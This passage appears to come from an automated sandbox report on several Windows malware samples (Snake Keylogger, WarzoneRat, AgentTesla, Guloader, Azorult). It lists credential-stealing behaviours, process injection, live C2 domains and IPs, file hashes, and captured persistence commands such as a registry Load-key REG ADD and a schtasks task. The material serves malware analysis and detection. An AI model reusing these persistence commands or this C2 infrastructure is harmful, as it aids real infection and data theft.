| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
"C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe"
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 868
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sslamlssa1.tumblr.com | udp |
| N/A | 74.114.154.22:443 | sslamlssa1.tumblr.com | tcp |
Files
memory/1140-60-0x0000000001090000-0x0000000001091000-memory.dmp
memory/1140-62-0x0000000000900000-0x0000000000901000-memory.dmp
memory/1852-64-0x000000000046B76D-mapping.dmp
memory/1852-63-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/1852-65-0x0000000075D41000-0x0000000075D43000-memory.dmp
memory/1852-66-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/1820-67-0x0000000000000000-mapping.dmp
memory/1820-68-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
117s
Max time network
154s
Command Line
Signatures
Snake Keylogger
WarzoneRat, AveMaria
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\jceDxBmua.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\gnyDKq. = "0" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3236 set thread context of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe |
| PID 2720 set thread context of 1544 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
| PID 1768 set thread context of 1648 | N/A | C:\Users\Admin\AppData\Roaming\jceDxBmua.exe | C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\jceDxBmua.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
"C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe"
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\jceDxBmua.exe
"C:\Users\Admin\AppData\Roaming\jceDxBmua.exe"
C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe
C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 87.120.37.96:80 | N/A | tcp |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | checkip.dyndns.org | udp |
| N/A | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
C:\ProgramData\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
C:\Users\Admin\AppData\Roaming\jceDxBmua.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jceDxBmua.exe.log
| MD5 | 9e7845217df4a635ec4341c3d52ed685 |
| SHA1 | d65cb39d37392975b038ce503a585adadb805da5 |
| SHA256 | d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b |
| SHA512 | 307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1 |
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
Analysis: behavioral10
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
109s
Max time network
35s
Command Line
Signatures
AgentTesla
AgentTesla Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\kprUEGC = "C:\\Users\\Admin\\AppData\\Roaming\\kprUEGC\\kprUEGC.exe" | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1844 set thread context of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
"C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qqUYUQOSj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5199.tmp"
C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
"C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 87.120.37.96:80 | N/A | tcp |
| N/A | 91.92.109.175:80 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\tmp5199.tmp
| MD5 | 31c2f502d8b37cb5681c558270502714 |
| SHA1 | 81d4b7f27d75e97ff52d8f1b0a6049970cf519a9 |
| SHA256 | 2f5ae3230accaca945c141a0599ed32b4fe97231356f4ab2d344c49822fd06d5 |
| SHA512 | d4d9d11f4080e7bf3868eafb7562e3b1364672683297aed0ca6e94114471248b49942c79608591a16f83d94bcada03426fb8066fd9215884897714ec9f14d6f5 |
Analysis: behavioral13
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
14s
Max time network
154s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
"C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe"
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
5s
Max time network
45s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
116s
Max time network
139s
Command Line
Signatures
Snake Keylogger
WarzoneRat, AveMaria
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 680 set thread context of 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe |
| PID 4012 set thread context of 2268 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
| PID 4000 set thread context of 1936 | N/A | C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
"C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe"
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe
"C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe"
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | checkip.dyndns.org | udp |
| N/A | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
C:\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\.GobDsGtn.exe.log
| MD5 | 9e7845217df4a635ec4341c3d52ed685 |
| SHA1 | d65cb39d37392975b038ce503a585adadb805da5 |
| SHA256 | d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b |
| SHA512 | 307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1 |
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
Analysis: behavioral5
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
22s
Max time network
125s
Command Line
Signatures
Azorult
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 568 set thread context of 3796 | N/A | C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe | C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe |
Suspicious use of WriteProcessMemory
Processes
